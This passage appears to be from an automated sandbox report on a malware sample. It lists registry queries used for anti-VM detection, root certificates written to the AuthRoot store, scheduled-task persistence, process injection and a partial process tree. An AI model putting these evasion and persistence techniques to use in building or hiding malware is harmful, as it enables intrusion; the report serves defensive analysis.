opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uXivbut.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed90bc6894.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 c025a997b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString c025a997b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 784 timeout.exe 3632 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 4028 taskkill.exe 3352 taskkill.exe 3232 taskkill.exe 3628 taskkill.exe 3668 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 2164843fd0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 2164843fd0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 2164843fd0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 2fc4862a06.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 2fc4862a06.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1564 schtasks.exe 3800 schtasks.exe 1824 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2488 7tzlyz8.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2372 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe 2816 skotes.exe 1492 2164843fd0.exe 1492 2164843fd0.exe 1492 2164843fd0.exe 1492 2164843fd0.exe 1492 2164843fd0.exe 1740 b711227598.exe 2464 2fc4862a06.exe 2464 2fc4862a06.exe 2464 2fc4862a06.exe 2464 2fc4862a06.exe 1740 b711227598.exe 1740 b711227598.exe 1740 b711227598.exe 1740 b711227598.exe 1888 monthdragon.exe 1888 monthdragon.exe 1888 monthdragon.exe 1888 monthdragon.exe 2220 53d97ceeb1.exe 2220 53d97ceeb1.exe 2220 53d97ceeb1.exe 2612 62be2e4ee5.exe 2220 53d97ceeb1.exe 2220 53d97ceeb1.exe 2844 025263805b.exe 1856 ad8ebfe024.exe 2476 ftS1RPn.exe 2968 uXivbut.exe 1256 Gxtuum.exe 1748 8QQOJj9.exe 2016 5aeda337ba.exe 2016 5aeda337ba.exe 2016 5aeda337ba.exe 1104 sha256.exe 2016 5aeda337ba.exe 2016 5aeda337ba.exe 1748 8QQOJj9.exe 1748 8QQOJj9.exe 1748 8QQOJj9.exe 1748 8QQOJj9.exe 2488 7tzlyz8.exe 1736 206f21b5b7.exe 1736 206f21b5b7.exe 1736 206f21b5b7.exe 1736 206f21b5b7.exe 1736 206f21b5b7.exe 1512 8891a969d4.exe 776 c025a997b8.exe 2936 powershell.exe 776 c025a997b8.exe 2936 powershell.exe 2936 powershell.exe 2360 TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE 776 c025a997b8.exe 904 chrome.exe 904 chrome.exe 3236 powershell.exe 2360 TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE 2360 TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE 3616 powershell.exe 3712 powershell.exe 2496 DF9PCFR.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeDebugPrivilege 2220 53d97ceeb1.exe Token: SeDebugPrivilege 2016 5aeda337ba.exe Token: SeDebugPrivilege 2488 7tzlyz8.exe Token: SeDebugPrivilege 2488 7tzlyz8.exe Token: SeDebugPrivilege 2192 AddInProcess32.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 2360 TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Token: SeDebugPrivilege 3616 powershell.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeDebugPrivilege 3712 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeShutdownPrivilege 904 chrome.exe Token: SeDebugPrivilege 1852 AddInProcess32.exe Token: SeDebugPrivilege 3668 taskkill.exe Token: SeDebugPrivilege 4028 taskkill.exe Token: SeDebugPrivilege 3352 taskkill.exe Token: SeDebugPrivilege 3232 taskkill.exe Token: SeDebugPrivilege 3628 taskkill.exe Token: SeDebugPrivilege 2112 powershell.exe Token: SeDebugPrivilege 1368 firefox.exe Token: SeDebugPrivilege 1368 firefox.exe -
Suspicious use of FindShellTrayWindow 57 IoCs
pid Process 2372 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe 1248 amnew.exe 2968 uXivbut.exe 1860 c8eeb9dd28.exe 1860 c8eeb9dd28.exe 1860 c8eeb9dd28.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 904 chrome.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3040 d4f1f629e6.exe 3040 d4f1f629e6.exe 3040 d4f1f629e6.exe 3480 962135d7e8.exe 1368 firefox.exe 1368 firefox.exe 1368 firefox.exe 1368 firefox.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 1860 c8eeb9dd28.exe 1860 c8eeb9dd28.exe 1860 c8eeb9dd28.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3040 d4f1f629e6.exe 3040 d4f1f629e6.exe 3040 d4f1f629e6.exe 3480 962135d7e8.exe 1368 firefox.exe 1368 firefox.exe 1368 firefox.exe 3480 962135d7e8.exe 3480 962135d7e8.exe 3480 962135d7e8.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2488 7tzlyz8.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2816 2372 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe 31 PID 2372 wrote to memory of 2816 2372 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe 31 PID 2372 wrote to memory of 2816 2372 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe 31 PID 2372 wrote to memory of 2816 2372 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe 31 PID 2816 wrote to memory of 1248 2816 skotes.exe 33 PID 2816 wrote to memory of 1248 2816 skotes.exe 33 PID 2816 wrote to memory of 1248 2816 skotes.exe 33 PID 2816 wrote to memory of 1248 2816 skotes.exe 33 PID 1248 wrote to memory of 2008 1248 amnew.exe 34 PID 1248 wrote to memory of 2008 1248 amnew.exe 34 PID 1248 wrote to memory of 2008 1248 amnew.exe 34 PID 1248 wrote to memory of 2008 1248 amnew.exe 34 PID 2816 wrote to memory of 1492 2816 skotes.exe 35 PID 2816 wrote to memory of 1492 2816 skotes.exe 35 PID 2816 wrote to memory of 1492 2816 skotes.exe 35 PID 2816 wrote to memory of 1492 2816 skotes.exe 35 PID 2008 wrote to memory of 296 2008 futors.exe 38 PID 2008 wrote to memory of 296 2008 futors.exe 38 PID 2008 wrote to memory of 296 2008 futors.exe 38 PID 2008 wrote to memory of 296 2008 futors.exe 38 PID 2816 wrote to memory of 2852 2816 skotes.exe 39 PID 2816 wrote to memory of 2852 2816 skotes.exe 39 PID 2816 wrote to memory of 2852 2816 skotes.exe 39 PID 2816 wrote to memory of 2852 2816 skotes.exe 39 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 1888 296 monthdragon.exe 40 PID 296 wrote to memory of 2848 296 monthdragon.exe 41 PID 296 wrote to memory of 2848 296 monthdragon.exe 41 PID 296 wrote to memory of 2848 296 monthdragon.exe 41 PID 296 wrote to memory of 2848 296 monthdragon.exe 41 PID 2816 wrote to memory of 2464 2816 skotes.exe 42 PID 2816 wrote to memory of 2464 2816 skotes.exe 42 PID 2816 wrote to memory of 2464 2816 skotes.exe 42 PID 2816 wrote to memory of 2464 2816 skotes.exe 42 PID 2816 wrote to memory of 1740 2816 skotes.exe 43 PID 2816 wrote to memory of 1740 2816 skotes.exe 43 PID 2816 wrote to memory of 1740 2816 skotes.exe 43 PID 2816 wrote to memory of 1740 2816 skotes.exe 43 PID 2816 wrote to memory of 2220 2816 skotes.exe 44 PID 2816 wrote to memory of 2220 2816 skotes.exe 44 PID 2816 wrote to memory of 2220 2816 skotes.exe 44 PID 2816 wrote to memory of 2220 2816 skotes.exe 44 PID 2816 wrote to memory of 2220 2816 skotes.exe 44 PID 2816 wrote to memory of 2220 2816 skotes.exe 44 PID 2816 wrote to memory of 2220 2816 skotes.exe 44 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 PID 2220 wrote to memory of 3068 2220 53d97ceeb1.exe 45 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe"C:\Users\Admin\AppData\Local\Temp\54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2372 -
